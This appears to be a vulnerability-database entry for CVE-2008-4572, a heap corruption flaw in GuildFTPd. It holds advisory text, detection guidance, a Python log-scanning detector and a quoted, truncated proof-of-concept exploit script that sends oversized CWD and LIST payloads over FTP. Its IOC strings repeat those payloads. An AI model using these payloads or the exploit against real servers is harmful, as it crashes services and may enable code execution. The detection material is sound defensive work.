CVE-2008-4572
Published 2008-10-15
Priority: P261 · critical · 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 60.69% (99.0th percentile)
GuildFTPd 0.999.14, and possibly other versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long arguments to the CWD and LIST commands, which triggers heap corruption related to an improper free call, and possibly triggering a heap-based buffer overflow.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| guildftpd | guildftpd | — | — |
Detection & IOCs (extracted from sources)
commandcwd /././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././↗
commandlist XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX↗
- Detect exploitation attempts by monitoring FTP traffic for a CWD command with an abnormally long argument consisting of repeated '/.' patterns (124 repetitions = 248 chars) followed by a LIST command with a long argument (~100 chars).
- The attack requires a valid FTP login (including anonymous) before issuing the malicious CWD and LIST commands; alert on authenticated FTP sessions sending oversized CWD or LIST arguments.
- The vulnerability triggers heap corruption via an improper free() call, manifesting as overwritten registers ECX and EDI; crash/DoS of the GuildFTPd process is the observable outcome.
- Target process is GuildFTPd versions 0.999.8.11 and 0.999.14 on Windows; monitor for unexpected termination of the GuildFTPd service process following receipt of long CWD/LIST commands.
- Anonymous FTP access is sufficient to exploit this vulnerability; disabling anonymous login does not fully mitigate the risk as any valid credential works.
- Both GuildFTPd 0.999.8.11 and 0.999.14 are confirmed vulnerable; version checks should cover both branches.
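The detection guidance above can be applied to FTP command logs as follows. This is an added example, not code from any of the indexed sources; the log line format, the `MAX_ARG` threshold, the `/.` run length and the function name `scan` are assumptions to adapt to your own server's logging.

```python
import re
from collections import defaultdict

# Assumed log format (constructed): "<time> <session> <user> <VERB> <argument>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\w+)(?: (.*))?$")
MAX_ARG = 96                           # assumption: tune to your longest legitimate path
DOT_RUN = re.compile(r"(?:/\.){16,}")  # long run of "/." as described for the CWD argument

def scan(lines):
    """Return (session, user, reason) alerts for oversized CWD/LIST arguments."""
    alerts = []
    long_cwd = defaultdict(bool)       # sessions that already sent a suspicious CWD
    for line in lines:
        m = LINE_RE.match(line.rstrip("\r\n"))
        if not m:
            continue
        _, sess, user, verb, arg = m.groups()
        verb, arg = verb.upper(), arg or ""   # FTP verbs are case-insensitive
        if verb not in ("CWD", "LIST"):
            continue
        if verb == "CWD" and DOT_RUN.search(arg):
            alerts.append((sess, user, "CWD with repeated '/.' run (%d chars)" % len(arg)))
            long_cwd[sess] = True
        elif len(arg) > MAX_ARG:
            alerts.append((sess, user, "oversized %s argument (%d chars)" % (verb, len(arg))))
            if verb == "CWD":
                long_cwd[sess] = True
        # Highest-confidence signal: both halves of the sequence in one session.
        if verb == "LIST" and len(arg) > MAX_ARG and long_cwd[sess]:
            alerts.append((sess, user, "oversized CWD followed by oversized LIST"))
    return alerts

# Constructed sample log: two benign sessions and one matching the described sequence.
SAMPLE = [
    "12:00:01 s1 alice CWD /pub/docs",
    "12:00:02 s1 alice LIST",
    "12:00:05 s2 anonymous CWD " + "/." * 124,
    "12:00:06 s2 anonymous LIST " + "X" * 100,
    "12:00:09 s3 bob list -la",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Correlating these alerts with an unexpected exit of the GuildFTPd process shortly afterwards separates a crash from a blocked or failed attempt.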
GHSA
GHSA-2ppc-v4fh-g52h: GuildFTPd 0
ghsa_unreviewed·2022-05-02
CVE-2008-4572 [HIGH] CWE-119 GHSA-2ppc-v4fh-g52h: GuildFTPd 0
GuildFTPd 0.999.14, and possibly other versions, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long arguments to the CWD and LIST commands, which triggers heap corruption related to an improper free call, and possibly triggering a heap-based buffer overflow.
VMware
Updated service console patches.
vendor_vmware·2008-01-07·CVSS 1.2
CVE-2007-3108 [LOW] Updated service console patches.
VMSA-2008-0001: Updated service console patches.
CVEs: CVE-2007-3108, CVE-2007-4572, CVE-2007-5116, CVE-2007-5135, CVE-2007-5191, CVE-2007-5360, CVE-2007-5398
No detection rules found.
Exploit-DB
GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service
exploitdb·2008-10-12
CVE-2008-4572 GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service
---
```python
# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
# GuildFTPd URL - http://www.guildftpd.com
# cwd/list heap corruption
# overwrite registers in free(): ecx, edi
#
# (x)dmnt 2008
# feel free to do shellcode
# -*- coding: windows-1252 -*-
import socket
import sys, time

evil_cwd = "/."*124
evil_dir = "X"*100

def help_info():
    print ("Usage: guildd0s \n")
    print ("Note: anonymous is enought\n")

def dos_it(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\n" %passwd)
    r=sock.
```
Metasploit
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
metasploit
Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable to heap corruption. You need to have a valid login so you can run CWD and LIST.
No writeups or analysis indexed.
- http://secunia.com/advisories/32218
- http://securityreason.com/securityalert/4422
- http://www.securityfocus.com/bid/31729
- http://www.vupen.com/english/advisories/2008/2794
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45818
- https://www.exploit-db.com/exploits/6738
Published: 2008-10-15